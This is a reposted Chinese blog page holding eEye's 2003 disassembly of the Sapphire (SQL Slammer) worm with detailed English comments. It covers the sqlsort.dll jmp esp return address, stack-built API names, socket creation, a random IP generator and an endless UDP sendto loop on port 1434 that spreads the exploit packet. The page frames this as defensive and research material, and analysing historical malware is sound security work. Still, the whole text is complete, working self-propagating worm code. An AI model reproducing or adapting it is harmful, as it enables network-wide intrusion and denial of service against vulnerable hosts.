
Sapphire 蠕虫反汇编代码[转载]（eEye Digital Security 2003-01-25 的分析，仅供防御与研究参考）

wanglihui

    Sapphire 蠕虫反汇编代码（eEye Digital Security, 2003-01-25）
  
  
  
  ;SAPPHIRE WORM CODE DISASSEMBLED
  ;eEye Digital Security: January 25, 2003
  ;
  ; Reviewer notes: 32-bit x86, Intel/MASM syntax, Win32 stdcall (callee pops
  ; its arguments). Every absolute address below (42B0C9DCh, 42AE10xxh) is a
  ; hard-coded guess for one build of sqlsort.dll - nothing is resolved
  ; dynamically, so the code is tied to that DLL version.
  ; ebp is set once (below) and all [ebp-XX] references are fixed offsets into
  ; the strings/arguments this code pushes at runtime. Layout relative to ebp
  ; (ebp = address of the 04000000h dword):
  ;   ebp+3          first byte (04h) of the 376-byte datagram re-sent in the loop
  ;   ebp-04h        0 terminator     ebp-10h  "kernel32.dll"
  ;   ebp-14h        0 terminator     ebp-20h  "GetTickCount"
  ;   ebp-2Ch        "ws2_32.dll"     ebp-34h  "socket"     ebp-3Ch "sendto"
  ;   ebp-40h        ws2_32 base      ebp-48h  kernel32 base (later overwritten by 0)
  ;   ebp-50h        sockaddr_in: sin_family 0002h (AF_INET), sin_port 059Ah (1434)
  ;   ebp-4Ch        sockaddr_in.sin_addr = PRNG state (the next target IP)
  ;   ebp-48h/-44h   sockaddr_in.sin_zero (zeros)
  ;   ebp-54h        UDP socket handle
  
  
  push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
  ; ^ the value that overwrote the saved return address (a "jmp esp" gadget in
  ;   sqlsort.dll). Re-pushed here so the re-sent packet carries it as well.
  mov eax, 1010101h ; Rebuild the request buffer: the bytes below the return
  ; address are corrupted between the overflow and the start of this code, so
  ; 18h (24) dwords of 01010101h (96 bytes of 01h filler) are pushed back.
  ; They double as the body of the datagram sent by the PRND loop below.
  xor ecx, ecx
  mov cl, 18h ; ecx = 24 (partial write is safe: ecx was just zeroed)
  
  FIXUP:
  push eax
  loop FIXUP ; ecx is 0 on exit; the `push ecx` lines below use it as a NUL pad
  xor eax, 5010101h ; eax = 04000000h -> bytes 00 00 00 04 on the stack
  ; (the two constants avoid the 00h bytes the final value contains)
  push eax ; the 04h byte, at ebp+3, is the first byte of the outgoing packet
  mov ebp, esp ; ebp = fixed base for every [ebp-XX] reference below
  push ecx ; 0: terminator for "kernel32.dll"
  push 6C6C642Eh ; ".dll"
  push 32336C65h ; "el32"
  push 6E72656Bh ; "kern"   -> [ebp-10h] = "kernel32.dll"
  push ecx ; 0: terminator for "GetTickCount"
  push 746E756Fh ; "ount"
  push 436B6369h ; "ickC"
  push 54746547h ; "GetT"   -> [ebp-20h] = "GetTickCount"
  mov cx, 6C6Ch ; "ll\0\0" (upper half of ecx is still 0)
  push ecx
  push 642E3233h ; "32.d"
  push 5F327377h ; "ws2_"   -> [ebp-2Ch] = "ws2_32.dll"
  mov cx, 7465h ; "et\0\0"
  push ecx
  push 6B636F73h ; "sock"   -> [ebp-34h] = "socket"
  mov cx, 6F74h ; "to\0\0"
  push ecx
  push 646E6573h ; "send"   -> [ebp-3Ch] = "sendto"
  mov esi, 42AE1018h ; sqlsort.dll IAT slot assumed to hold LoadLibrary (hard-coded)
  lea eax, [ebp-2Ch] ; "ws2_32.dll"
  push eax
  call dword ptr [esi] ; LoadLibrary("ws2_32.dll")
  push eax ; [ebp-40h] = ws2_32 base, reused for both ws2_32 GetProcAddress calls
  lea eax, [ebp-20h] ; "GetTickCount" (2nd arg of the GetProcAddress call below)
  push eax
  lea eax, [ebp-10h] ; "kernel32.dll"
  push eax
  call dword ptr [esi] ; LoadLibrary("kernel32.dll")
  push eax ; kernel32 base (1st arg of the GetProcAddress call below)
  mov esi, 42AE1010h ; sqlsort.dll IAT slot assumed to hold GetProcAddress
  mov ebx, [esi] ; ebx = GetProcAddress pointer read from the IAT (reused before PRND)
  mov eax, [ebx] ; first 4 bytes of the function
  cmp eax, 51EC8B55h ; bytes 55 8B EC 51 = push ebp / mov ebp,esp / push ecx
  jz short VALID_GP ; prologue fingerprint matched -> trust this IAT slot
  ; No match: fall back to a different IAT slot. Both slots are fixed guesses for
  ; particular DLL builds rather than a real import resolver, so on other DLL
  ; versions this may call the wrong function and crash the process instead.
  mov esi, 42AE101Ch ; IAT entry -> 77EA094C (per eEye)
  
  VALID_GP:
  call dword ptr [esi] ; GetProcAddress(kernel32, "GetTickCount")
  call eax ; GetTickCount(): the only entropy source for the PRNG seed
  xor ecx, ecx
  push ecx ; sin_zero (this overwrites the kernel32 base slot at ebp-48h)
  push ecx ; sin_zero
  push eax ; [ebp-4Ch] = tick count: PRNG seed AND sockaddr_in.sin_addr
  xor ecx, 9B040103h ; two XORs so neither operand contains a 00h byte
  xor ecx, 1010101h ; ecx = 9A050002h
  push ecx ; [ebp-50h] = sin_family 0002h (AF_INET), sin_port 059Ah (1434, network order)
  lea eax, [ebp-34h] ; "socket"
  push eax
  mov eax, [ebp-40h] ; ws2_32 base
  push eax
  call dword ptr [esi] ; GetProcAddress(ws2_32, "socket")
  push 11h ; IPPROTO_UDP (17)
  push 2 ; SOCK_DGRAM
  push 2 ; AF_INET
  call eax ; socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
  push eax ; [ebp-54h] = socket handle (return value is never checked)
  lea eax, [ebp-3Ch] ; "sendto"
  push eax
  mov eax, [ebp-40h] ; ws2_32 base
  push eax
  call dword ptr [esi] ; GetProcAddress(ws2_32, "sendto")
  mov esi, eax ; esi = sendto, live for the whole loop
  or ebx, ebx ; sets flags only; ebx still holds the GetProcAddress pointer
  xor ebx, 0FFD9613Ch ; ebx = that pointer XOR 0FFD9613Ch = additive term of the LCG
  ; NOTE(review): since `or ebx,ebx` leaves ebx unchanged, the increment is not
  ; the constant itself but depends on the address read from the IAT, i.e. on
  ; the DLL version, which also changes which targets the generator can reach.
  ; An `xor ebx,ebx` here would have made the increment exactly 0FFD9613Ch;
  ; whether that was the intent cannot be determined from the code alone.
  
  PRND:
  mov eax, [ebp-4Ch] ; x = current state (= sin_addr of the previous packet)
  lea ecx, [eax+eax*2] ; ecx = 3x
  lea edx, [eax+ecx*4] ; edx = 13x
  shl edx, 4 ; edx = 208x
  add edx, eax ; edx = 209x
  shl edx, 8 ; edx = 53504x
  sub edx, eax ; edx = 53503x
  lea eax, [eax+edx*4] ; eax = 214013x (mod 2^32)
  add eax, ebx ; x' = 214013*x + ebx : a linear congruential generator
  mov [ebp-4Ch], eax ; store state; this slot IS sockaddr_in.sin_addr, so the raw
  ; 32-bit output becomes the next destination IP with no range filtering at all.
  push 10h ; tolen = sizeof(sockaddr_in) = 16
  lea eax, [ebp-50h]
  push eax ; to = &sockaddr_in
  xor ecx, ecx
  push ecx ; flags = 0
  xor cx, 178h ; ecx = 178h = 376
  push ecx ; len = 376 bytes
  lea eax, [ebp+3]
  push eax ; buf: 04h, 96 bytes of 01h, the return address, then this code -
  ; a copy of the exploit packet that infected this host.
  mov eax, [ebp-54h]
  push eax ; s = UDP socket
  call esi ; sendto(s, buf, 376, 0, &sa, 16); callee pops the 6 args, so esp is
  ; back at ebp-54h every iteration and the loop does not grow the stack.
  jmp short PRND ; unconditional, no delay, no exit: packets are emitted as fast
  ; as sendto returns (the bandwidth-exhaustion behaviour of this worm).
  
  
